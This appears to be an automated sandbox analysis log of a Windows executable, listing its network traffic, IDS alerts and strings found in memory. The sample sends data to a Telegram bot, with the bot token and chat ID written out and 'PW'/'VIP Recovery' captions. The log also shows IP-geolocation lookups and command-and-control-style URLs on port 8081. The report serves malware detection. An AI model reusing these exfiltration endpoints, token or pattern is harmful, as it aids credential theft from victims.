                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd34fa2af9aca0Host: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd351d7aa4bd0fHost: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd354481d11c88Host: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd35652fc0d40eHost: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd35fa1b258218Host: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3635e1258cc8Host: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3681b72dd0b8Host: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd36a5d1642b7dHost: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd36f2934ae498Host: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3744214678b7Host: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd39fc539c7760Host: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3a42a08a2d1aHost: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3a8a01617b77Host: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3ad90f094b47Host: api.telegram.orgContent-Length: 585
                    Source: Joe Sandbox View IP Address: 149.154.167.220
                    Source: Joe Sandbox View IP Address: 104.21.112.1
                    Source: Joe Sandbox View IP Address: 193.122.6.168
                    Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                    Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknown DNS query: name: checkip.dyndns.org
                    Source: unknown DNS query: name: reallyfreegeoip.org
                    Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49757 -> 193.122.6.168:80
                    Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49732 -> 193.122.6.168:80
                    Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49751 -> 104.21.112.1:443
                    Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49815 -> 104.21.112.1:443
                    Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49773 -> 104.21.112.1:443
                    Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                    Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
                    Source: unknown HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49744 version: TLS 1.0
                    Source: unknown HTTPS traffic detected: 192.168.2.7:49807 -> 104.21.112.1:443 version: TLS 1.0
                    Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                    Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
                    Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216554%0D%0ADate%20and%20Time:%2011/01/2025%20/%2005:41:05%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216554%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
                    Source: global traffic DNS traffic detected: DNS query: time.windows.com
                    Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
                    Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
                    Source: global traffic DNS traffic detected: DNS query: api.telegram.org
                    Source: unknown HTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd32713826b139 Host: api.telegram.org Content-Length: 585
                    Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 22:06:36 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.00000000029F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                    Source: Yef4EqsQha.exe, 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                    Source: Yef4EqsQha.exe, 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002931000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
                    Source: Yef4EqsQha.exe, 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002931000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002931000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
                    Source: Yef4EqsQha.exe, 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/q
                    Source: Yef4EqsQha.exe, 00000006.00000002.3837864810.00000000060E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/
                    Source: Yef4EqsQha.exe, 00000006.00000002.3829533118.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/&
                    Source: Yef4EqsQha.exe, 00000006.00000002.3837864810.00000000060E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com//
                    Source: Yef4EqsQha.exe, 00000006.00000002.3837864810.00000000060E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/Y
                    Source: Yef4EqsQha.exe, 00000006.00000002.3837864810.00000000060E0000.00000004.00000020.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3837864810.000000000616B000.00000004.00000020.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3837864810.0000000006114000.00000004.00000020.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3829533118.0000000000B49000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.6.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                    Source: Yef4EqsQha.exe, 00000006.00000002.3837864810.000000000615E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?032a5301acec8
                    Source: Yef4EqsQha.exe, 00000006.00000002.3837864810.000000000615E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?83a11a1991a5b
                    Source: Yef4EqsQha.exe, 00000006.00000002.3837864810.000000000615E000.00000004.00000020.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3829533118.0000000000B49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?ac595039059ff
                    Source: Yef4EqsQha.exe, 00000006.00000002.3829533118.0000000000B49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?b8a64a4cbe408
                    Source: Yef4EqsQha.exe, 00000006.00000002.3837864810.000000000616B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab~
                    Source: Yef4EqsQha.exe, 00000006.00000002.3829533118.0000000000B49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enB
                    Source: Yef4EqsQha.exe, 00000006.00000002.3829533118.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?b8a64a4cbe
                    Source: Yef4EqsQha.exe, 00000000.00000002.1384875417.0000000000BF3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://go.mic
                    Source: Yef4EqsQha.exe, 00000000.00000002.1389923913.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002931000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: Yef4EqsQha.exe, 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002931000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
                    Source: Yef4EqsQha.exe, 00000006.00000002.3835066178.0000000003951000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
                    Source: Yef4EqsQha.exe, 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3830796545.00000000029DD000.00000004.00000800.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3830796545.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-451
                    Source: Yef4EqsQha.exe, 00000006.00000002.3835066178.0000000003951000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: Yef4EqsQha.exe, 00000006.00000002.3835066178.0000000003951000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: Yef4EqsQha.exe, 00000006.00000002.3835066178.0000000003951000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.00000000029F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
                    Source: Yef4EqsQha.exe, 00000006.00000002.3835066178.0000000003951000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: Yef4EqsQha.exe, 00000006.00000002.3835066178.0000000003951000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: Yef4EqsQha.exe, 00000006.00000002.3835066178.0000000003951000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: Yef4EqsQha.exe, 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002931000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
                    Source: Yef4EqsQha.exe, 00000006.00000002.3835066178.0000000003951000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
                    Source: Yef4EqsQha.exe, 00000006.00000002.3835066178.0000000003951000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.00000000029F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50213 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50127
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50150 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50164 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50173 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50152 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50201 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50233 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50223 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50163 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50140 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50205
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50207
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50209
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50201
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50203
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50185 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50175
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50177
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50179
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50181
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50183
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50125 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50185
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50113 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50187
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50189
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50205 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50183 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50191
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50193
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50159 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50195
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50227 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50195 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50147 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50197
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50199
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50139
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50138
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50193 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
